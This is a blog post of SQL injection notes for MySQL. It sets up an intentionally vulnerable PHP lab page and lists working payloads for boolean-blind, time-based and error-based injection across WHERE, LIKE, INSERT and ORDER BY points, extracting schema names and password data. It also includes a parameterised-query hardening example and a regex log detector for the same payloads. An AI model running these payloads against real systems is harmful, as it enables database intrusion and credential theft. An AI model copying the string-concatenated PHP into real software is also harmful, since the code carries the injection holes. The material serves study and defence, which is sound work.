
2024/2/6 14:51 SQL Injection Notes

SQL Injection Notes
Original by 鬼麦子, 2022-11-02 19:20, Shaanxi

Just a set of SQL injection notes aimed at MySQL, for my own quick lookup later and for tuning my scanner; as I get older I keep forgetting things, so I need a more detailed and systematic cheat sheet.

Theory & environment
Test environment

ubuntu20+mysql8.0+php7.4

SQL injection categories:

Error-based injection

Blind (boolean-based) injection

Time-based injection

And, by how the SQL is concatenated and where the injection point sits:

WHERE injection

LIKE injection

INSERT/UPDATE

ORDER BY

and SQL concatenation at other positions in the statement

Database name: example_vul

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 1/13

Table creation

CREATE TABLE `user` (
  id INT NOT NULL AUTO_INCREMENT,
  name VARCHAR(50) NOT NULL,
  password VARCHAR(50) NOT NULL,
  PRIMARY KEY ( `id` )
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

INSERT INTO `user` ( name, password ) VALUES ( 'admin', 'admin123');

INSERT INTO `user` ( name, password ) VALUES ( 'user', 'user123');

PHP code


<?php
// database connection
ini_set("display_errors", "On"); // show errors in the response
error_reporting(E_ALL | E_STRICT);
// http://192.168.72.6/example_vul/2.php
$con = mysqli_connect('localhost', 'debian-sys-maint', 'aaaa', 'example_vul');
if (!$con) {
    die('Could not connect: ' . mysqli_connect_error());
}
$method = $_GET['method'];
$data = array();
if ($method == 'where_int') {
    // WHERE numeric injection: $id is concatenated into the statement unquoted
    // http://192.168.72.6/example_vul/2.php?method=where_int&id=1
    $id = $_GET['id'];
    $query = "SELECT * FROM user where id =$id";
    $result = $con->query($query) or die('<pre>database error... </pre>');
    while ($row = mysqli_fetch_assoc($result)) {
        $data = array("id" => $row['id'], "name" => $row['name']);
    }
    echo json_encode($data);

} elseif ($method == 'like') {
    // LIKE injection: $name is concatenated inside the '%...%' pattern
    // http://192.168.72.6/example_vul/2.php?method=like&name=a
    $name = $_GET['name'];
    $query = "SELECT * FROM `user` where name LIKE '%$name%'";
    $result = $con->query($query) or die('<pre>database error... </pre>');
    while ($row = mysqli_fetch_assoc($result)) {
        $data = array("id" => $row['id'], "name" => $row['name']);
    }
    echo json_encode($data);

} elseif ($method == 'insert') {
    // INSERT injection: $password is concatenated into the VALUES list
    // http://192.168.72.6/example_vul/2.php?method=insert&password=aaaaaaa
    $password = $_GET['password'];
    $query = "INSERT INTO user ( name, password ) VALUES ( 'user', '$password' );";
    $result = $con->query($query) or die('<pre>database error... </pre>');
    echo 'insert ok!';

} elseif ($method == 'order_by') {
    // ORDER BY injection: $order is concatenated after the sort column
    // http://192.168.72.6/example_vul/2.php?method=order_by&order=asc
    $order = $_GET['order'];
    $query = "SELECT * FROM `user` order by name $order";
    $result = $con->query($query) or die('<pre>database error... </pre>');
    while ($row = mysqli_fetch_assoc($result)) {
        $data = array("id" => $row['id'], "name" => $row['name']);
    }
    echo json_encode($data);

} elseif ($method == 'where_string') {
    // WHERE string injection: $name is concatenated inside single quotes
    // http://192.168.72.6/example_vul/2.php?method=where_string&name=admin
    $name = $_GET['name'];
    $query = "SELECT * FROM user where name ='$name'";
    $result = $con->query($query) or die('<pre>database error... </pre>');
    while ($row = mysqli_fetch_assoc($result)) {
        $data = array("id" => $row['id'], "name" => $row['name']);
    }
    echo json_encode($data);

} elseif ($method == 'where') {
    // WHERE error-based injection: the MySQL error text is echoed back to the client
    // http://192.168.72.6/example_vul/2.php?method=where&id=1
    $id = $_GET['id'];
    $query = "SELECT * FROM user where id =$id";
    $result = $con->query($query) or die('error: ' . $con->error);
    while ($row = mysqli_fetch_assoc($result)) {
        //$data = array("id" => $row['id'], "name" => $row['name']);
        echo $row['id'] . "<br>";
        echo $row['name'];
    }
    //echo json_encode($data);
}
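All five handlers above concatenate raw request parameters into SQL, which is what every payload in the rest of these notes relies on. As an added example, not part of the original article, here is the hardened counterpart written in Python against an in-memory sqlite3 copy of the `user` table (an assumption standing in for the MySQL setup; the approach is identical with mysqli prepared statements): integer validation for `id`, bound parameters for the string values, LIKE wildcards escaped, and an allow-list for the ORDER BY direction, which cannot be a bound parameter. The probes used in the notes (`1-0`, `a%'and'1`, `admin'and'999999`, `asc,1`) are either rejected or treated as plain data.

```python
import sqlite3

# Constructed in-memory copy of the page's `user` table (sqlite3 stands in for MySQL here).
SCHEMA = """
CREATE TABLE user (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name VARCHAR(50) NOT NULL,
    password VARCHAR(50) NOT NULL
);
INSERT INTO user (name, password) VALUES ('admin', 'admin123');
INSERT INTO user (name, password) VALUES ('user', 'user123');
"""

# The ORDER BY direction cannot be bound, so it is mapped through an allow-list instead.
ORDER_ALLOWLIST = {"asc": "ASC", "desc": "DESC"}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def where_int(conn, id_value):
    """method=where_int: reject anything that is not an integer, then bind it."""
    try:
        id_int = int(str(id_value).strip())
    except ValueError:
        raise ValueError("id must be an integer, got %r" % (id_value,))
    return conn.execute("SELECT id, name FROM user WHERE id = ?", (id_int,)).fetchall()


def _escape_like(fragment):
    """Escape LIKE metacharacters so the user's text matches literally."""
    return (fragment.replace("\\", "\\\\")
                    .replace("%", "\\%")
                    .replace("_", "\\_"))


def like(conn, name):
    """method=like: the wildcards stay in the pattern, the user text is escaped and bound."""
    pattern = "%" + _escape_like(name) + "%"
    return conn.execute(
        "SELECT id, name FROM user WHERE name LIKE ? ESCAPE '\\' ORDER BY id", (pattern,)
    ).fetchall()


def insert(conn, password):
    """method=insert: the value is bound, so quotes inside it are stored, not executed."""
    conn.execute("INSERT INTO user (name, password) VALUES ('user', ?)", (password,))
    conn.commit()
    return conn.execute("SELECT password FROM user ORDER BY id DESC LIMIT 1").fetchone()[0]


def order_by(conn, order):
    """method=order_by: only 'asc' or 'desc' is accepted; anything else is rejected."""
    direction = ORDER_ALLOWLIST.get(str(order).strip().lower())
    if direction is None:
        raise ValueError("order must be asc or desc, got %r" % (order,))
    return conn.execute(
        "SELECT id, name FROM user ORDER BY name " + direction + ", id"
    ).fetchall()


def where_string(conn, name):
    """method=where_string: plain bound parameter."""
    return conn.execute(
        "SELECT id, name FROM user WHERE name = ? ORDER BY id", (name,)
    ).fetchall()


def is_rejected(fn, *args):
    """True when the handler refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    c = connect()
    print(where_int(c, "1"))                    # [(1, 'admin')]
    print(is_rejected(where_int, c, "1-0"))     # True: not an integer
    print(like(c, "a%'and'1"))                  # []: matched literally, no rows
    print(where_string(c, "admin'and'999999"))  # []
    print(is_rejected(order_by, c, "asc,1"))    # True
    print(insert(c, "1'and 1 and'"))            # stored verbatim
```

The one case a bound parameter cannot solve is ORDER BY: the direction is syntax, not data, so the handler maps the request value through a fixed dictionary and refuses anything else; the same applies to column names if those ever come from the client.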

Dumping data
1. For real-world needs, the goal is to get the data in the password column.

2. Under SRC (vendor bug-bounty platform) rules, the goal is to get the table name.

3. For the scanner, one check is enough: an error and its closure (a payload that breaks the statement beside one that closes it cleanly) to confirm the vulnerability exists.

Blind injection steps

1. Determine whether it is SQL injection

2. Get the database name

3. Get the table names from the database name

4. Get the column names from the table name

5. Get the data from the column names.

The targets are clear, so let's get started!


WHERE numeric injection

Determine whether it is SQL injection:

http://192.168.72.6/example_vul/2.php?method=where_int&id=1

SQL actually executed: SELECT * FROM user where id =1

http://192.168.72.6/example_vul/2.php?method=where_int&id=1-1 evaluates to false

SQL actually executed: SELECT * FROM user where id =1-1

http://192.168.72.6/example_vul/2.php?method=where_int&id=1-0 evaluates to true

SQL actually executed: SELECT * FROM user where id =1-0

Determine the database name length with length(database())

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if(length(database())=11,1,exp(11111111111111))

SQL actually executed: SELECT * FROM user where id =1 and if(length(database())=11,1,exp(11111111111111))

Get the database name; database() evaluates to example_vul

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if(database() regexp '^e',1,exp(11111111111111))


Use Burp Intruder to enumerate the value of database() one character at a time; the table names, column names and data below are obtained the same way.

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if(database() regexp '^example_vul',1,exp(11111111111111))

SQL actually executed: SELECT * FROM user where id =1 and if(database() regexp '^example_vul',1,exp(11111111111111))

Get the table name: regexp '^user'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111))

SQL actually executed: SELECT * FROM user where id =1 and if((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111))


Get the column name: regexp '^password'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = 'user' limit 2,1) regexp '^password',1,exp(11111111111111))

SQL actually executed: SELECT * FROM user where id =1 and if((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = 'user' limit 2,1) regexp '^password',1,exp(11111111111111));

Get the data: '^admin123'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111))

SQL actually executed: SELECT * FROM user where id =1 and if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111))

LIKE injection

Compared with WHERE, only the concatenated statement differs.

Determine whether it is injectable

http://192.168.72.6/example_vul/2.php?method=like&name=a

http://192.168.72.6/example_vul/2.php?method=like&name=a' evaluates to false

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and'1 evaluates to true


Get the table name: regexp '^user'

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and if((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111)) and'1

SQL actually executed: SELECT * FROM user where name LIKE '%a%'and if((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111)) and'1%';

Get the data: '^admin123'

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'1

SQL actually executed: SELECT * FROM user where name LIKE '%a%'and if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'1%';

INSERT injection; UPDATE/DELETE work the same way

In a blind INSERT, a subquery that SELECTs from the same table fails with "You can't specify target table 'message' for update in FROM clause", so the payload has to be adjusted. Fix: wrap the SELECT result in a derived (intermediate) table and SELECT from it once more, which avoids the error.

http://192.168.72.6/example_vul/2.php?method=insert&password=aaaaaaa replace the parameter value to inject

Determine whether it is injectable

http://192.168.72.6/example_vul/2.php?method=insert&password=1'and a and' evaluates to false


http://192.168.72.6/example_vul/2.php?method=insert&password=1'and 1 and' evaluates to true

Get the data: '^admin123'

http://192.168.72.6/example_vul/2.php?method=insert&password=11'and if((select password from (SELECT password FROM user) as aaaaaa limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'

SQL actually executed: INSERT INTO user ( name, password ) VALUES ( 'user', '1'and if((select password from (SELECT password FROM user) as aaaaaa limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'' );

ORDER BY injection

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc replace the parameter value to inject

Determine whether it is injectable

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc,333333333333 evaluates to false

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc,1 evaluates to true

Get the data: '^admin123'

http://192.168.72.6/example_vul/2.php?method=order_by&order=,if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) asc

SQL actually executed: SELECT * FROM user order by name ,if((select password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) asc;


WHERE string injection

The previous ones all used if(); this time use case when 1 then 1 else exp(111111) end

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin

Determine whether it is injectable

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin'axd'999999 evaluates to false

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin'and'999999 evaluates to true

Get the data: '^admin123'

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin' and case when (select password from user limit 0,1) regexp '^admin123' then 1 else exp(1111111111111) end and'1

SQL actually executed: SELECT * FROM user where name ='admin' and case when (select password from user limit 0,1) regexp '^admin123' then 1 else exp(1111111111111) end and'1';

Time-based injection: when there is no echo, i.e. no response content to compare, boolean-based blind injection is not possible and time-based injection is needed. Just replace the exp() function with sleep(3) or benchmark(10000000,sha(1)) and use the response time as the signal for the injection.

Error-based injection: certain functions return the data directly in the error message, so no more enumeration is needed.


http://192.168.72.6/example_vul/2.php?method=where&id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

http://192.168.72.6/example_vul/2.php?method=where&id=1 and updatexml(1,concat(0x7e,(select password from user limit 0,1),0x7e),1)
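Seen from the server side, every technique in these notes is a small set of request signatures: if() or case when wrapped around exp() of a huge argument (which overflows DOUBLE and makes MySQL raise an error, giving the true/false split), regexp '^...' prefix probes, information_schema lookups, sleep()/benchmark() for the time-based variant and updatexml() for the error-based one. As an added example, not part of the original article, the following Python scans access-log lines (constructed here in common log format from the payload shapes in these notes plus two benign requests) after URL-decoding the query string, and reports which signature families each line matches. It assumes the web server logs the full query string; the rule set is a starting point for a WAF rule or a SIEM search, not a complete one.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (common log format); not taken from any real server.
# Spaces in the query string are %20-encoded as a browser or proxy would send them.
SAMPLE_LOG = r"""
192.168.72.1 - - [02/Nov/2022:19:20:01 +0800] "GET /example_vul/2.php?method=where_int&id=1 HTTP/1.1" 200 32
192.168.72.1 - - [02/Nov/2022:19:20:02 +0800] "GET /example_vul/2.php?method=where_int&id=1%20and%20if(length(database())=11,1,exp(11111111111111)) HTTP/1.1" 200 32
192.168.72.1 - - [02/Nov/2022:19:20:03 +0800] "GET /example_vul/2.php?method=like&name=a%25'and%20if((select%20TABLE_NAME%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA='example_vul'%20limit%202,1)%20regexp%20'^user',1,exp(11111111111111))%20and'1 HTTP/1.1" 200 32
192.168.72.1 - - [02/Nov/2022:19:20:04 +0800] "GET /example_vul/2.php?method=where&id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1) HTTP/1.1" 200 58
192.168.72.1 - - [02/Nov/2022:19:20:05 +0800] "GET /example_vul/2.php?method=where_int&id=1%20and%20if((select%20password%20from%20user%20limit%200,1)%20regexp%20'^admin123',1,sleep(3)) HTTP/1.1" 200 32
192.168.72.1 - - [02/Nov/2022:19:20:06 +0800] "GET /example_vul/2.php?method=order_by&order=asc HTTP/1.1" 200 32
192.168.72.1 - - [02/Nov/2022:19:20:07 +0800] "GET /example_vul/2.php?method=where_string&name=admin'%20and%20case%20when%20(select%20password%20from%20user%20limit%200,1)%20regexp%20'^admin123'%20then%201%20else%20exp(1111111111111)%20end%20and'1 HTTP/1.1" 200 32
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Signature families from the notes; each pattern runs against the decoded query string.
RULES = [
    # if(cond, 1, exp(<huge>)): the DOUBLE-overflow trick behind the boolean-blind probes
    ("boolean_if_exp", re.compile(r"\bif\s*\(.*\bexp\s*\(\s*\d{6,}", re.I)),
    # case when ... then ...: the same trick in CASE form
    ("case_when", re.compile(r"\bcase\s+when\b.*\bthen\b", re.I)),
    # regexp '^...': character-by-character prefix matching
    ("regexp_probe", re.compile(r"\bregexp\s+'\^", re.I)),
    # schema enumeration through the catalog tables
    ("information_schema", re.compile(r"information_schema\.", re.I)),
    # sleep()/benchmark(): time-based variant
    ("time_delay", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    # updatexml(): error-based variant
    ("error_based", re.compile(r"\bupdatexml\s*\(", re.I)),
    # a quote directly touching and/or: the 'and'1 style closure used to rebalance quotes
    ("quote_and_or", re.compile(r"'\s*(?:and|or)\b|\b(?:and|or)\s*'", re.I)),
]


def decode_query(request_target):
    """Return the URL-decoded query string of a request target such as /2.php?id=1%20and%201."""
    return unquote_plus(urlsplit(request_target).query)


def match_rules(decoded_query):
    """Sorted names of every rule that fires on the decoded query string."""
    return sorted(name for name, rx in RULES if rx.search(decoded_query))


def scan_log(text):
    """Map 1-based line number -> matched rule names, for flagged lines only."""
    hits = {}
    for lineno, line in enumerate(text.strip().splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        rules = match_rules(decode_query(m.group(1)))
        if rules:
            hits[lineno] = rules
    return hits


if __name__ == "__main__":
    for lineno, rules in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (lineno, ", ".join(rules)))
```

Decoding before matching matters: the `%25` in the LIKE probe only becomes a `%` after one round of decoding, and raw-log rules that skip this step miss payloads that were encoded on the way in. Lines 1 and 6 (plain `id=1` and `order=asc`) produce no hit, which is the false-positive check to keep when extending the rule list.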
